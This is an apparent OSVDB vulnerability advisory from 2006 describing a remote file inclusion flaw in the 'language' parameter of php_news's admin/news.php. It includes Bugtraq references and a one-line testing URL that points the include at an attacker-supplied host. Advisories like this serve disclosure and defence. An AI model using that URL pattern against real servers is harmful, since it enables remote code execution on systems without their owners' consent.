php_news admin/news.php language Variable Remote File Inclusion

2006-09-25T19:59:55
ID OSVDB:32316
Type osvdb
Reporter OSVDB
Modified 2006-09-25T19:59:55

Description

Manual Testing Notes

http://[target]/[path]/admin/news.php?language=[attacker]

References:

Related OSVDB ID: 32317 Related OSVDB ID: 32315 Related OSVDB ID: 32318 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0419.html Bugtraq ID: 20209